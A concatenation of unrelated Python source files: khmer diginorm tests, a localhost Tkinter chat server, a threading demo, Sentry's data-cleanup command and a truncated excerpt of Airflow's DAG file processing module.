'd/2']), seqs
def test_diginorm_basic_functionality_3():
# This data is entirely unpaired, but with one duplicate ('A...').
# and a random sequence ('G...'). With 'C=1' only three seqs should
# be left, with no other complaints.
CUTOFF = ['-C', '1']
PAIRING = []
infile = utils.copy_test_data('dn-test-none-paired.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = list(CUTOFF) + list(PAIRING) + ['-k', '15', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = set([r.name for r in screed.open(outfile)])
assert seqs == set(['a/1',
'b/2',
'd/1']), seqs
def test_diginorm_basic_functionality_4():
# This data is mixed paired/unpaired, but with one duplicate ('A...').
# and a random sequence ('G...'). With 'C=2' all of the sequences
# should be kept.
CUTOFF = ['-C', '1']
infile = utils.copy_test_data('dn-test-some-paired-all-keep.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = list(CUTOFF) + ['-k', '15', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = set([r.name for r in screed.open(outfile)])
assert seqs == set(['a/1', 'a/2',
'b/2',
'c/1', 'c/2',
'd/2']), seqs
def test_diginorm_basic_functionality_5():
# each of these pairs has both a multicopy sequence ('ACTTCA...') and
# a random sequence. With 'C=1' and '-p', all should be
CUTOFF = ['-C', '1']
PAIRING = ['-p']
infile = utils.copy_test_data('dn-test-all-paired-all-keep.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = list(CUTOFF) + list(PAIRING) + ['-k', '15', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = set([r.name for r in screed.open(outfile)])
assert seqs == set(['a/1', 'a/2',
'b/1', 'b/2',
'c/1', 'c/2',
'd/1', 'd/2']), seqs
def test_normalize_by_median_outfile_closed_err():
infile1 = utils.get_test_data('paired-mixed.fa.pe')
infile2 = utils.get_test_data("test-abund-read-2.fa")
outfile = utils.get_temp_filename('outfile_xxx')
script = 'normalize-by-median.py'
args = ['-o', outfile, infile1, infile2]
(status, out, err) = utils.runscript(script, args)
assert status == 0, (out, err)
assert os.path.exists(outfile)
def test_normalize_by_median_long_k():
CUTOFF = '2'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '33', '-H', 'murmur', infile]
utils.runscript(script, args, in_dir)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 1, seqs
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
def test_normalize_by_median_long_k_twobit_fails():
CUTOFF = '2'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '33', '-H', 'murmur', infile,
'-H', 'twobit-exact']
(status, out, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status == 1
assert "'twobit-exact' only supports k-mer sizes <= 32" in err
def test_normalize_by_median_long_k_save_fails():
CUTOFF = '2'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '33', '-H', 'murmur', infile, '-s', 'foo']
(status, out, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status == 1
assert 'ERROR: cannot save different hash functions yet.' in err
def test_normalize_by_median_long_k_load_fails():
CUTOFF = '2'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '33', '-H', 'murmur', infile, '-l', 'foo']
(status, out, err) = utils.runscript(script, args, in_dir, fail_ok=True)
print(out)
print(err)
assert status == 1
assert 'ERROR: cannot load different hash functions yet.' in err
|
Server.py
|
import socket
import threading
from tkinter import *
import tkinter.scrolledtext
host = '127.0.0.1'
port = 9090
class Server:
def __init__(self, HOST, PORT):
self.gui_done = False
self.running = True
gui_threading = threading.Thread(target=self.gui_loop)
running_threading = threading.Thread(target=self.receive)
gui_threading.start()
running_threading.start()
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((HOST, PORT))
self.server.listen()
self.client, self.address = self.server.accept()
def gui_loop(self):
self.root = Tk()
self.root['background'] = "lightblue"
self.root.geometry('500x630')
self.root.maxsize(500, 630)
self.root.minsize(500, 630)
self.root.title('SecureChat Server - By Ritesh Kr. Gupta')
self.chat_label = Label(self.root, text="CHAT:", bg='lightblue', font=(15,))
self.chat_label.pack(padx=10, pady=5)
self.chat = tkinter.scrolledtext.ScrolledText(self.root)
self.chat.pack(padx=10, pady=5)
self.chat.config(state='disable', bg='lightgreen')
self.msg_label = Label(self.root, text='Message: ', bg='lightblue', font=(10,))
self.msg_label.pack(padx=10, pady=5)
self.text = tkinter.Text(self.root, height=3, bg='lightgreen')
self.text.pack(padx=10, pady=5)
self.button = Button(self.root, text='Send', bg='lightpink', width=15, height=1, font=("", 13), relief=SUNKEN,
command=self.send)
self.button.pack(pady=15)
self.gui_done = True
self.root.protocol('WM_DELETE_WINDOW', self.stop)
self.root.mainloop()
def send(self):
if self.gui_done:
message = f"{self.text.get('1.0', 'end')}"
self.chat.config(state='normal')
self.chat.insert('end', "You : " + message)
self.chat.yview('end')
self.chat.config(state='disable')
message = "Server: " + message
self.client.send(message.encode('utf-8'))
self.text.delete('1.0', 'end')
def stop(self):
self.running = False
self.root.destroy()
self.server.close()
exit(0)
def receive(self):
while self.running:
try:
message = self.client.recv(1024).decode('utf-8')
if self.gui_done:
self.chat.config(state='normal')
self.chat.insert('end', message)
self.chat.yview('end')
self.chat.config(state='disable')
except ConnectionError:
break
except:
print("Connection Error")
Server(host, port)
|
threading_daemon_join_timeout.py
|
import threading
import time
import logging
def daemon():
logging.debug('Starting')
time.sleep(0.2)
logging.debug('Exiting')
def non_daemon():
logging.debug('Starting')
logging.debug('Exiting')
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
d = threading.Thread(name='daemon', target=daemon, daemon=True)
t = threading.Thread(name='non-daemon', target=non_daemon)
d.start()
t.start()
d.join(0.1)
print('d.isAlive()', d.isAlive())
t.join()
|
cleanup.py
|
"""
sentry.runner.commands.cleanup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2015 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
from datetime import timedelta
from uuid import uuid4
import click
from django.utils import timezone
from sentry.runner.decorators import log_options
from six.moves import xrange
# allows services like tagstore to add their own (abstracted) models
# to cleanup
EXTRA_BULK_QUERY_DELETES = []
def get_project(value):
from sentry.models import Project
try:
if value.isdigit():
return int(value)
if '/' not in value:
return None
org, proj = value.split('/', 1)
return Project.objects.get_from_cache(
organization__slug=org,
slug=proj,
).id
except Project.DoesNotExist:
return None
# We need a unique value to indicate when to stop multiprocessing queue
# an identity on an object() isn't guaranteed to work between parent
# and child proc
_STOP_WORKER = '91650ec271ae4b3e8a67cdc909d80f8c'
def multiprocess_worker(task_queue):
# Configure within each Process
import logging
from sentry.utils.imports import import_string
logger = logging.getLogger('sentry.cleanup')
configured = False
while True:
j = task_queue.get()
if j == _STOP_WORKER:
task_queue.task_done()
return
# On first task, configure Sentry environment
if not configured:
from sentry.runner import configure
configure()
from sentry import models
from sentry import deletions
from sentry import similarity
skip_models = [
# Handled by other parts of cleanup
models.Event,
models.EventMapping,
models.EventAttachment,
models.UserReport,
models.Group,
models.GroupEmailThread,
models.GroupRuleStatus,
# Handled by TTL
similarity.features,
] + [b[0] for b in EXTRA_BULK_QUERY_DELETES]
configured = True
model, chunk = j
model = import_string(model)
try:
task = deletions.get(
model=model,
query={'id__in': chunk},
skip_models=skip_models,
transaction_id=uuid4().hex,
)
while True:
if not task.chunk():
break
except Exception as e:
logger.exception(e)
finally:
task_queue.task_done()
@click.command()
@click.option('--days', default=30, show_default=True, help='Numbers of days to truncate on.')
@click.option('--project', help='Limit truncation to only entries from project.')
@click.option(
'--concurrency',
type=int,
default=1,
show_default=True,
help='The total number of concurrent worker processes to run.'
)
@click.option(
'--silent', '-q', default=False, is_flag=True, help='Run quietly. No output on success.'
)
@click.option('--model', '-m', multiple=True)
@click.option('--router', '-r', default=None, help='Database router')
@click.option(
'--timed',
'-t',
default=False,
is_flag=True,
help='Send the duration of this command to internal metrics.'
)
@log_options()
def cleanup(days, project, concurrency, silent, model, router, timed):
"""Delete a portion of trailing data based on creation date.
All data that is older than `--days` will be deleted. The default for
this is 30 days. In the default setting all projects will be truncated
but if you have a specific project you want to limit this to this can be
done with the `--project` flag which accepts a project ID or a string
with the form `org/project` where both are slugs.
"""
if concurrency < 1:
click.echo('Error: Minimum concurrency is 1', err=True)
raise click.Abort()
# Make sure we fork off multiprocessing pool
# before we import or configure the app
from multiprocessing import Process, JoinableQueue as Queue
pool = []
task_queue = Queue(1000)
for _ in xrange(concurrency):
p = Process(target=multiprocess_worker, args=(task_queue,))
p.daemon = True
p.start()
pool.append(p)
from sentry.runner import configure
configure()
from django.db import router as db_router
from sentry.db.deletion import BulkDeleteQuery
from sentry import models
if timed:
import time
from sentry.utils import metrics
start_time = time.time()
# list of models which this query is restricted to
model_list = {m.lower() for m in model}
def is_filtered(model):
if router is not None and db_router.db_for_write(model) != router:
return True
if not model_list:
return False
return model.__name__.lower() not in model_list
# Deletions that use `BulkDeleteQuery` (and don't need to worry about child relations)
# (model, datetime_field, order_by)
BULK_QUERY_DELETES = [
(models.EventMapping, 'date_added', '-date_added'),
(models.EventAttachment, 'date_added', None),
(models.UserReport, 'date_added', None),
(models.GroupEmailThread, 'date', None),
(models.GroupRuleStatus, 'date_added', None),
] + EXTRA_BULK_QUERY_DELETES
# Deletions that use the `deletions` code path (which handles their child relations)
# (model, datetime_field, order_by)
DELETES = (
(models.Event, 'datetime', 'datetime'),
(models.Group, 'last_seen', 'last_seen'),
)
if not silent:
click.echo('Removing expired values for LostPasswordHash')
if is_filtered(models.LostPasswordHash):
if not silent:
click.echo('>> Skipping LostPasswordHash')
else:
models.LostPasswordHash.objects.filter(
date_added__lte=timezone.now() - timedelta(hours=48)
).delete()
if is_filtered(models.OrganizationMember) and not silent:
click.echo('>> Skipping OrganizationMember')
else:
click.echo('Removing expired values for OrganizationMember')
expired_threshold = timezone.now() - timedelta(days=days)
models.OrganizationMember.delete_expired(expired_threshold)
for model in [models.ApiGrant, models.ApiToken]:
if not silent:
click.echo(u'Removing expired values for {}'.format(model.__name__))
if is_filtered(model):
if not silent:
click.echo(u'>> Skipping {}'.format(model.__name__))
else:
model.objects.filter(expires_at__lt=timezone.now()).delete()
project_id = None
if project:
click.echo(
"Bulk NodeStore deletion not available for project selection", err=True)
project_id = get_project(project)
if project_id is None:
click.echo('Error: Project not found', err=True)
raise click.Abort()
for bqd in BULK_QUERY_DELETES:
if len(bqd) == 4:
model, dtfield, order_by, chunk_size = bqd
else:
chunk_size = 10000
model, dtfield, order_by = bqd
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
).execute(chunk_size=chunk_size)
for model, dtfield, order_by in DELETES:
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
imp = '.'.join((model.__module__, model.__name__))
q = BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
)
for chunk in q.iterator(chunk_size=100):
task_queue.put((imp, chunk))
task_queue.join()
# Clean up FileBlob instances which are no longer used and aren't super
# recent (as there could be a race between blob creation and reference)
if not silent:
click.echo("Cleaning up unused FileBlob references")
if is_filtered(models.FileBlob):
if not silent:
click.echo('>> Skipping FileBlob')
else:
cleanup_unused_files(silent)
# Shut down our pool
for _ in pool:
task_queue.put(_STOP_WORKER)
# And wait for it to drain
for p in pool:
p.join()
if timed:
duration = int(time.time() - start_time)
metrics.timing('cleanup.duration', duration, instance=router)
click.echo("Clean up took %s second(s)." % duration)
def cleanup_unused_files(quiet=False):
"""
Remove FileBlob's (and thus the actual files) if they are no longer
referenced by any File.
We set a minimum-age on the query to ensure that we don't try to remove
any blobs which are brand new and potentially in the process of being
referenced.
"""
from sentry.models import File, FileBlob, FileBlobIndex
if quiet:
from sentry.utils.query import RangeQuerySetWrapper
else:
from sentry.utils.query import RangeQuerySetWrapperWithProgressBar as RangeQuerySetWrapper
cutoff = timezone.now() - timedelta(days=1)
queryset = FileBlob.objects.filter(
timestamp__lte=cutoff,
)
for blob in RangeQuerySetWrapper(queryset):
if FileBlobIndex.objects.filter(blob=blob).exists():
continue
if File.objects.filter(blob=blob).exists():
continue
blob.delete()
|
dag_processing.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import re
import signal
import sys
import time
import zipfile
from abc import ABCMeta, abstractmethod
from collections import defaultdict
from collections import namedtuple
from importlib import import_module
import enum
from typing import Optional
import psutil
from setproctitle import setproctitle
from six.moves import reload_module
from tabulate import tabulate
# To avoid circular imports
import airflow.models
from airflow import configuration as conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.models import errors
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.helpers import reap_process_group
from airflow.utils.db import provide_session
from airflow.utils.log.logging_mixin import LoggingMixin
class SimpleDag(BaseDag):
"""
A simplified representation of a DAG that contains all attributes
required for instantiating and scheduling its associated tasks.
"""
def __init__(self, dag, pickle_id=None):
"""
:param dag: the DAG
:type dag: airflow.models.DAG
:param pickle_id: ID associated with the pickled version of this DAG.
:type pickle_id: unicode
"""
self._dag_id = dag.dag_id
self._task_ids = [task.task_id for task in dag.tasks]
self._full_filepath = dag.full_filepath
self._is_paused = dag.is_paused
self._concurrency = dag.concurrency
self._pickle_id = pickle_id
self._task_special_args = {}
for task in dag.tasks:
special_args = {}
if task.task_concurrency is not None:
special_args['task_concurrency'] = task.task_concurrency
if len(special_args) > 0:
self._task_special_args[task.task_id] = special_args
@property
def dag_id(self):
"""
:return: the DAG ID
:rtype: unicode
"""
return self._dag_id
@property
def task_ids(self):
"""
:return: A list of task IDs that are in this DAG
:rtype: list[unicode]
"""
return self._task_ids
@property
def full_filepath(self):
"""
:return: The absolute path to the file that contains this DAG's definition
:rtype: unicode
"""
return self._full_filepath
@property
def concurrency(self):
"""
:return: maximum number of tasks that can run simultaneously from this DAG
:rtype: int
"""
return self._concurrency
@property
def is_paused(self):
"""
:return: whether this DAG is paused or not
:rtype: bool
"""
return self._is_paused
@property
def pickle_id(self):
"""
:return: The pickle ID for this DAG, if it has one. Otherwise None.
:rtype: unicode
"""
return self._pickle_id
@property
def task_special_args(self):
return self._task_special_args
def get_task_special_arg(self, task_id, special_arg_name):
if task_id in self._task_special_args and special_arg_name in self._task_special_args[task_id]:
return self._task_special_args[task_id][special_arg_name]
else:
return None
class SimpleTaskInstance:
def __init__(self, ti):
self._dag_id = ti.dag_id
self._task_id = ti.task_id
self._execution_date = ti.execution_date
self._start_date = ti.start_date
self._end_date = ti.end_date
self._try_number = ti.try_number
self._state = ti.state
self._executor_config = ti.executor_config
if hasattr(ti, 'run_as_user'):
self._run_as_user = ti.run_as_user
else:
self._run_as_user = None
if hasattr(ti, 'pool'):
self._pool = ti.pool
else:
self._pool = None
if hasattr(ti, 'priority_weight'):
self._priority_weight = ti.priority_weight
else:
self._priority_weight = None
self._queue = ti.queue
self._key = ti.key
@property
def dag_id(self):
return self._dag_id
@property
def task_id(self):
return self._task_id
@property
def execution_date(self):
return self._execution_date
@property
def start_date(self):
return self._start_date
@property
def end_date(self):
return self._end_date
@property
def try_number(self):
return self._try_number
@property
def state(self):
return self._state
@property
def pool(self):
return self._pool
@property
def priority_weight(self):
return self._priority_weight
@property
def queue(self):
return self._queue
@property
def key(self):
return self._key
@property
def executor_config(self):
return self._executor_config
@provide_session
def construct_task_instance(self, session=None, lock_for_update=False):
"""
Construct a TaskInstance from the database based on the primary key
:param session: DB session.
:param lock_for_update: if True, indicates that the database should
lock the TaskInstance (issuing a FOR UPDATE clause) until the
session is committed.
"""
TI = airflow.models.TaskInstance
qry = session.query(TI).filter(
TI.dag_id == self._dag_id,
TI.task_id == self._task_id,
TI.execution_date == self._execution_date)
if lock_for_update:
ti = qry.with_for_update().first()
else:
ti = qry.first()
return ti
class SimpleDagBag(BaseDagBag):
"""
A collection of SimpleDag objects with some convenience methods.
"""
def __init__(self, simple_dags):
"""
Constructor.
:param simple_dags: SimpleDag objects that should be in this
:type list(airflow.utils.dag_processing.SimpleDagBag)
"""
self.simple_dags = simple_dags
self.dag_id_to_simple_dag = {}
for simple_dag in simple_dags:
self.dag_id_to_simple_dag[simple_dag.dag_id] = simple_dag
@property
def dag_ids(self):
"""
:return: IDs of all the DAGs in this
:rtype: list[unicode]
"""
return self.dag_id_to_simple_dag.keys()
def get_dag(self, dag_id):
"""
:param dag_id: DAG ID
:type dag_id: unicode
:return: if the given DAG ID exists in the bag, return the BaseDag
corresponding to that ID. Otherwise, throw an Exception
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if dag_id not in self.dag_id_to_simple_dag:
raise AirflowException("Unknown DAG ID {}".format(dag_id))
return self.dag_id_to_simple_dag[dag_id]
def correct_maybe_zipped(fileloc):
"""
If the path contains a folder with a .zip suffix, then
the folder is treated as a zip archive and path to zip is returned.
"""
_, archive, _ = re.search(r'((.*\.zip){})?(.*)'.format(re.escape(os.sep)), fileloc).groups()
if archive and zipfile.is_zipfile(archive):
return archive
else:
return fileloc
COMMENT_PATTERN = re.compile(r"\s*#.*")
def list_py_file_paths(directory, safe_mode=True,
include_examples=None):
"""
Traverse a directory and look for Python files.
:param directory: the directory to traverse
:type directory: unicode
:param safe_mode: whether to use a heuristic to determine whether a file
contains Airflow DAG definitions
:return: a list of paths to Python files in the specified directory
:rtype: list[unicode]
"""
if include_examples is None:
include_examples = conf.getboolean('core', 'LOAD_EXAMPLES')
file_paths = []
if directory is None:
return []
elif os.path.isfile(directory):
return [directory]
elif os.path.isdir(directory):
patterns_by_dir = {}
for root, dirs, files in os.walk(directory, followlinks=True):
patterns = patterns_by_dir.get(root, [])
ignore_file = os.path.join(root, '.airflowignore')
if os.path.isfile(ignore_file):
with open(ignore_file, 'r') as file:
# If we have new patterns create a copy so we don't change
# the previous list (which would affect other subdirs)
lines_no_comments = [COMMENT_PATTERN.sub("", line) for line in file.read().split("\n")]
patterns += [re.compile(line) for line in lines_no_comments if line]
# If we can ignore any subdirs entirely we should - fewer paths
# to walk is better. We have to modify the ``dirs`` array in
# place for this to affect os.walk
dirs[:] = [
d
for d in dirs
if not any(p.search(os.path.join(root, d)) for p in patterns)
]
# We want patterns defined in a parent folder's .airflowignore to
# apply to subdirs too
for d in dirs:
patterns_by_dir[os.path.join(root, d)] = patterns
for f in files:
try:
file_path = os.path.join(root, f)
if not os.path.isfile(file_path):
continue
_, file_ext = os.path.splitext(os.path.split(file_path)[-1])
if file_ext != '.py' and not zipfile.is_zipfile(file_path):
continue
if any([re.findall(p, file_path) for p in patterns]):
continue
# Heuristic that guesses whether a Python file contains an
# Airflow DAG definition.
might_contain_dag = True
if safe_mode and not zipfile.is_zipfile(file_path):
with open(file_path, 'rb') as fp:
content = fp.read()
might_contain_dag = all(
[s in content for s in (b'DAG', b'airflow')])
if not might_contain_dag:
continue
file_paths.append(file_path)
except Exception:
log = LoggingMixin().log
log.exception("Error while examining %s", f)
if include_examples:
import airflow.example_dags
example_dag_folder = airflow.example_dags.__path__[0]
file_paths.extend(list_py_file_paths(example_dag_folder, safe_mode, False))
return file_paths
class AbstractDagFileProcessor(metaclass=ABCMeta):
"""
Processes a DAG file. See SchedulerJob.process_file() for more details.
"""
@abstractmethod
def start(self):
"""
Launch the process to process the file
"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file
"""
raise NotImplementedError()
@property
@abstractmethod
def pid(self):
"""
:return: the PID of the process launched to process the given file
"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self):
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self):
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
DagParsingStat = namedtuple('DagParsingStat', ['file_paths', 'done', 'all_files_processed'])
class DagParsingSignal(enum.Enum):
AGENT_HEARTBEAT = 'agent_heartbeat'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
async_mode):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._async_mode = async_mode
# Map from file path to the processor
self._processors = {}
# Map from file path to the last runtime
self._last_runtime = {}
# Map from file path to the last finish time
self._last_finish_time = {}
# Map from file path to the number of runs
self._run_count = defaultdict(int)
# Pipe for communicating signals
self._process = None
self._done = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn = None
self._collected_dag_buffer = []
def start(self):
"""
Launch DagFileProcessorManager processor and start DAG parsing loop in manager.
"""
self._parent_signal_conn, child_signal_conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._file_paths,
self._max_runs,
self._processor_factory,
self._processor_timeout,
child_signal_conn,
self._async_mode,
)
)
self._process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_simple_dags calls _heartbeat_manager.
pass
def wait_until_finished(self):
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
return
@staticmethod
def _run_processor_manager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode):
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
reload_module(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
reload_module(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode)
processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
:return: List of parsing result in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._file_paths = stat.file_paths
self._done = stat.done
self._all_files_processed = stat.all_files_processed
@property
def file_paths(self):
return self._file_paths
@property
def done(self):
return self._done
@property
def all_files_processed(self):
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warn('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:type _file_path_queue: list[unicode]
:type _processors: dict[unicode, AbstractDagFileProcessor]
:type _last_runtime: dict[unicode, float]
:type _last_finish_time: dict[unicode, datetime.datetime]
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode=True):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: airflow.models.connection.Connection
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._async_mode = async_mode
self._parallelism = conf.getint('scheduler', 'max_threads')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.error("Cannot use more than 1 thread when using sqlite. "
"Setting parallelism to 1")
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler',
'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler',
'print_stats_interval')
# Map from file path to the processor
self._processors = {}
# Map from file path to the last runtime
self._last_runtime = {}
# Map from file path to the last finish time
self._last_finish_time = {}
self._last_zombie_query_time = timezone.utcnow()
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.utcnow()
# Last time stats were printed
self.last_stat_print_time = timezone.datetime(2000, 1, 1)
# TODO: Remove magic number
self._zombie_query_interval = 10
# Map from file path to the number of runs
self._run_count = defaultdict(int)
# Manager heartbeat key.
self._heart_beat_key = 'heart-beat'
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler',
'dag_dir_list_interval')
self._log = logging.getLogger('airflow.processor_manager')
